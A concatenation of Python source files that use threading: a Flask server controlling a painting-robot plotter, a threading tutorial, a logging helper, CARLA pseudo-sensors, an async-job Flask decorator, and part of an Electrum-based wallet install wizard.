"color3": Tool(colorX, color0Y-colorVerticalSpacing*3, 'xy', 17, 4),
"color4": Tool(colorX, color0Y-colorVerticalSpacing*4, 'xy', 17, 4),
"color5": Tool(colorX, color0Y-colorVerticalSpacing*5, 'xy', 17, 4),
"color6": Tool(colorX, color0Y-colorVerticalSpacing*6, 'xy', 17, 4),
"color7": Tool(colorX, color0Y-colorVerticalSpacing*7, 'xy', 17, 4)
}
canvas = Rect(104.81, 6.116, 286.250, 214.812)
penX = home[0]
penY = home[1]
penHeight = 0
servoHeight = 0 # TODO
currentTool = "water0"
lastDuration = 0 # TODO
distanceCounter = 0
paused = False
def getTimestamp():
# TODO: worry about locale
return time.strftime("%a %b %d %Y %X %Z")
def getPositionXSteps():
return int(0.5+(penX - home[0]) * stepsPerMM)
def getPositionYSteps():
return int(0.5+(home[1] - penY) * stepsPerMM)
def getPenData():
return { 'x': getPositionXSteps(), 'y': getPositionYSteps(), 'state':penHeight, 'height': servoHeight,
'power': 0, 'tool': currentTool, 'lastDuration': lastDuration,
'distanceCounter': distanceCounter / stepsPerMM, 'simulation': 0 }
@socketio.on('connect')
def chat_connect():
print ('socket.io connected',request.sid,request.namespace)
sids.add(request.sid)
myEmit('pen update', getPenData())
bufferUpdate()
@socketio.on('disconnect')
def chat_disconnect():
sids.remove(request.sid)
print ("Client disconnected")
def myEmit(m, d):
for sid in sids:
emit(m, d, room=sid, namespace='/')
@socketio.on('broadcast')
def chat_broadcast(message):
print ("test")
emit("chat", {'data': message['data']})
@socketio.on('message')
def handle_message(message):
print('received message: ' + message)
def ensureMotorsActive():
global motors
if not motors:
addBuffer(BUFFER_STEPPERS, True)
addBuffer(BUFFER_SET_XYZ, (penX,penY,(1-penHeight)*upZ+penHeight*downZ))
motors = True
def moveXY(xy):
global distanceCounter,penX,penY
ensureMotorsActive()
addBuffer(BUFFER_MOVE_XY, xy)
distanceCounter += math.sqrt((xy[0]-penX)**2+(xy[1]-penY)**2)
penX,penY = xy[0],xy[1]
def moveZ(z):
ensureMotorsActive()
addBuffer(BUFFER_MOVE_Z, z)
penHeight = (upZ-z)/(upZ-downZ)
def setTool(toolName):
global currentTool
if toolName not in tools:
print('unknown tool: ' + toolName)
return
print("Set tool", toolName)
currentTool = toolName
tool = tools[toolName]
moveZ(upZ)
moveXY((tool.x, tool.y))
moveZ(downZ)
for i in range(tool.wiggleIterations):
for axis in tool.wiggleAxis:
if axis == 'x':
moveXY((tool.x-tool.wiggleDistance,tool.y))
moveXY((tool.x+tool.wiggleDistance,tool.y))
else:
moveXY((tool.x,tool.y-tool.wiggleDistance))
moveXY((tool.x,tool.y+tool.wiggleDistance))
moveXY((tool.x, tool.y))
moveZ(upZ)
def clearBuffer():
buffer = []
bufferUpdate()
return jsonify( { 'status': 'buffer cleared' } )
@app.route('/')
def index():
return "Hello, World!"
@app.route('/v1/tools', methods=['GET'])
def handle_tools_GET():
return jsonify({'tools': list(sort(tools.keys()))})
@app.route('/v1/tools/<tool>', methods=['PUT'])
def handle_tools_PUT(tool):
if tool in tools:
setTool(tool)
return jsonify({'status': 'Tool changed to '+tool})
@app.route('/v1/motors', methods=['DELETE','PUT'])
def handle_motors():
global motors
if request.method == 'DELETE':
addBuffer(BUFFER_STEPPERS, False)
motors = False
return jsonify({'status': 'Disabled'})
elif request.method == 'PUT':
penX,penY = home[0],home[1]
penHeight = 0
addBuffer(BUFFER_SET_XYZ, home)
return jsonify({'status': 'Motor offset reset to park position'})
@app.route('/v1/pen', methods=['GET','PUT','DELETE'])
def handle_pen():
if request.method == 'GET':
return jsonify(getPenData())
elif request.method == 'DELETE':
moveZ(upZ)
moveXY(home)
return jsonify(getPenData())
elif request.method == 'PUT':
try:
x = request.json['x']
y = request.json['y']
moveXY( ( canvas.x0 + canvas.width * x / 100., canvas.y0 + canvas.height * (1.-y/100.) ) )
return jsonify(getPenData())
except KeyError:
try:
if request.json['resetCounter']:
distanceCounter = 0
return jsonify(getPenData())
except KeyError:
state = request.json['state']
if state == 'wash':
state = 1.2
elif state == 'wipe':
state = 0.9
elif state == 'paint':
state = 1.0
elif state == 'up':
state = 0.0
else:
try:
state = float(state)
if state < 0:
state = 0.
elif state > 1:
state = 1.
except:
return jsonify(getPenData())
moveZ( state * downZ + (1-state) * upZ )
return jsonify(getPenData())
else:
return jsonify(getPenData())
@app.route('/v1/buffer', methods=['GET','POST','PUT','DELETE'])
def handle_buffer():
def getData():
return jsonify({'running': False, 'paused': paused, 'count': len(buffer), 'buffer': buffer})
if request.method == 'DELETE':
return clearBuffer()
elif request.method == 'GET':
return getData()
elif request.method == 'PUT':
paused = request.json.get('paused', False)
print('paused',paused)
bufferData.set()
bufferUpdate()
return getData()
elif request.method == 'POST':
msg = request.json.get('message',None)
if msg:
addBuffer(BUFFER_MESSAGE,msg)
cb = request.json.get('callback',None)
if cb:
addBuffer(BUFFER_CALLBACK,cb)
return jsonify({'status': "Message added to buffer"})
def addBuffer(type,data):
buffer.append((type,data))
bufferData.set()
outXY = home
outZ = upZ
def sendBufferLine(sender):
global outXY, outZ
if not buffer:
return
data = buffer.pop(0)
cmds = []
if data[0] == BUFFER_CALLBACK:
print("Callback update:", data[1])
myEmit('callback update', {'name': data[1], 'timestamp': getTimestamp() })
elif data[0] == BUFFER_MESSAGE:
print("Message:", data[1])
myEmit('message update', {'message': data[1], 'timestamp': getTimestamp() })
elif data[0] == BUFFER_MOVE_XY:
fast = outZ >= upZ - 0.01
if fast:
speed = 60 * penUpSpeed
cmd = 'G00'
else:
speed = 60 * penDownSpeed
cmd = 'G01'
cmds.append( "%s F%.1f X%.3f Y%.3f" % (cmd, speed, data[1][0], data[1][1]) )
outXY = data[1]
elif data[0] == BUFFER_MOVE_Z:
speed = 60 * zSpeed
cmds.append( "G00 F%.1f Z%.3f" % (speed, data[1]) )
outZ = data[1]
elif data[0] == BUFFER_SET_XYZ:
cmds.append( "G90" )
cmds.append( "G92 X%.3f Y%.3f Z%.3f" % data[1] )
elif data[0] == BUFFER_STEPPERS:
if data[1]:
cmds.append( "M17" )
else:
cmds.append( "M18" )
else:
print("Unknown buffer item", data)
if cmds:
sender.sendCommands(cmds)
bufferUpdate()
def bufferUpdate():
myEmit('buffer update', { 'bufferList': [str(hash(a)) for a in buffer],
'bufferData': {},
'bufferRunning': alive,
'bufferPaused': paused,
'bufferPausePen': getPenData() })
def serialCommunicator(sender):
with app.test_request_context("/"):
while True:
bufferData.wait()
if not alive:
break
while not paused and buffer:
sendBufferLine(sender)
bufferData.clear()
if __name__ == '__main__':
if len(sys.argv) >= 2:
port = sys.argv[1]
else:
port = "auto"
if len(sys.argv) >= 3:
speed = int(sys.argv[2])
else:
speed = 115200
sender = GCodeSender(port,speed)
communicator = threading.Thread(target=serialCommunicator,args=(sender,))
communicator.daemon = True
communicator.start()
addBuffer(BUFFER_SET_XYZ,(home[0],home[1],upZ))
try:
app.run(debug=True and False,use_reloader=False,port=42420)
except KeyboardInterrupt:
sender.close()
|
1_threads.py | import time
from threading import Thread
####### SINGLE THREAD
def ask_user():
start = time.time()
user_input = input('Enter your name: ')
greet = f'Hello, {user_input}'
print(greet)
print('ask_user: ', time.time() - start)
def complex_calculation():
print('Started calculating...')
start = time.time()
[x**2 for x in range(20000000)]
print('complex_calculation: ', time.time() - start)
# With a single thread, we can do one at a time—e.g.
start = time.time()
ask_user()
complex_calculation()
print('Single thread total time: ', time.time() - start, '\n\n')
####### TWO THREADS
# With two threads, we can do them both at once...
thread = Thread(target=complex_calculation)
thread2 = Thread(target=ask_user)
start = time.time()
thread.start()
thread2.start()
thread.join()
thread2.join()
print('Two thread total time: ', time.time() - start)
# Run this and see what happens!
|
utils.py | import builtins
import datetime
import inspect
import threading
import time
global _c,_pq
_c={}
_pq=None
_tl=threading.Lock()
def _print_q():
global _pq
lt=time.time()
fs=__import__("storage")
fs.set_silent("log.log")
dt=fs.read("log.log")
lc=dt.count(b"\n")
while (True):
if (len(_pq)>0):
_tl.acquire()
a,sf,_pq=" ".join([str(e) for e in _pq[0][0]]),_pq[0][1],_pq[1:]
_tl.release()
s=datetime.datetime.now().strftime(f"[{sf.filename[:-3]}{('.'+sf.function if sf.function!='<module>' else '')}, %H:%M:%S] {a}")
builtins.print(s)
dt+=bytes(s,"utf-8")+b"\n"
lc+=1
if (lc>1024):
dt=dt[dt.index(b"\n")+1:]
if (time.time()>lt):
lt=time.time()+30
fs.write("log.log",dt)
def cache(fp):
global _c
if (fp in _c):
return _c[fp]
with open(fp,"rb") as f:
_c[fp]=f.read()
return _c[fp]
def print(*a):
global _pq
if (_pq is None):
_pq=[(a,inspect.getouterframes(inspect.currentframe(),2)[1])]
threading.Thread(target=_print_q).start()
else:
_tl.acquire()
_pq+=[(a,inspect.getouterframes(inspect.currentframe(),2)[1])]
_tl.release()
|
scene_layout_sensors.py |
import time
from threading import Thread
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
import scene_layout as scene_layout_parser # This should come from CARLA path
def threaded(fn):
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.setDaemon(True)
thread.start()
return thread
return wrapper
class SceneLayoutMeasurement(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class SceneLayoutReader(object):
def __init__(self, world):
"""
The scene layout just requires a reference to world where you will
extract all the necessary information.
"""
# The static scene dictionary of all the entire scene layout.
self.static_scene_dict = scene_layout_parser.get_scene_layout(CarlaDataProvider.get_map())
print("Map loaded. Number of waypoints: ", len(self.static_scene_dict))
# Callback attribute to set the function being used.
self._callback = None
# Just connect the scene layout directly with the sensors
self.read_scene_layout()
def __call__(self):
return self.static_scene_dict
@threaded # This thread just produces the callback once and dies.
def read_scene_layout(self):
while True:
# We will wait for the callback to be defined, produce a layout and then die.
if self._callback is not None:
self._callback(SceneLayoutMeasurement(self.__call__(), 0))
break
else:
time.sleep(0.01)
def listen(self, callback):
# Tell that this function receives what the producer does.
self._callback = callback
def stop(self):
# Nothing to stop here.
pass
def destroy(self):
# Nothing to destroy here.
pass
class ObjectMeasurements(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class ObjectFinder(object):
"""
Pseudo sensor that gives you the position of all the other dynamic objects and their states
"""
def __init__(self, world, reading_frequency):
"""
The object finder is used to give you the positions of all the
other dynamic objects in the scene and their properties.
"""
# Give the entire access there
# The vehicle where the class reads the speed
self._world = world
# Map used by the object finder
self._map = CarlaDataProvider.get_map()
# How often do you look at your speedometer in hz
self._reading_frequency = reading_frequency
self._callback = None
# Counts the frames
self._frame_number = 0
self._run_ps = True
self.find_objects()
def __call__(self):
""" We here work into getting all the dynamic objects """
return scene_layout_parser.get_dynamic_objects(self._world, self._map)
@threaded
def find_objects(self):
latest_speed_read = time.time()
while self._run_ps:
if self._callback is not None:
capture = time.time()
if capture - latest_speed_read > (1 / self._reading_frequency):
self._callback(ObjectMeasurements(self.__call__(), self._frame_number))
self._frame_number += 1
latest_speed_read = time.time()
else:
time.sleep(0.001)
def listen(self, callback):
# Tell that this function receives what the producer does.
self._callback = callback
def stop(self):
self._run_ps = False
def destroy(self):
self._run_ps = False
|
decorators.py | import functools
import uuid
import threading
from flask import request, make_response, g, jsonify, url_for, \
copy_current_request_context
from . import app
import kvstore
CONSUL_ENDPOINT = app.config.get('CONSUL_ENDPOINT')
kv = kvstore.Client(CONSUL_ENDPOINT)
def asynchronous(f):
"""Run the request asyncronously
Inital response:
- Status code 202 Accepted
- Location header with the URL of a job resource.
Job running:
- A GET request to the job returns 202
Job finished:
- Status code 303 See Other
- Location header points to the newly created resource
The client then needs to send a DELETE request to the task resource to
remove it from the system.
"""
@functools.wraps(f)
def decorator(*args, **kwargs):
id = uuid.uuid4().hex
kv.set('queue/{}/status'.format(id), 'pending')
@copy_current_request_context
def job():
response = make_response(f(*args, **kwargs))
status_code = response.status_code
if status_code == 201:
kv.set('queue/{}/status'.format(id), 'registered')
else:
kv.set('queue/{}/status'.format(id), 'error')
kv.set('queue/{}/status_code'.format(id), status_code)
kv.set('queue/{}/url'.format(id), response.headers['Location'])
job = threading.Thread(target=job)
job.start()
location = url_for('api.get_async_job_status', id=id, _external=True)
return jsonify({'url': location}), 202, {
'Location': location}
return decorator
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-bsty.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = ""
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.seed_type, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
if self.opt_slip39:
options.append('slip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, seed_type, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
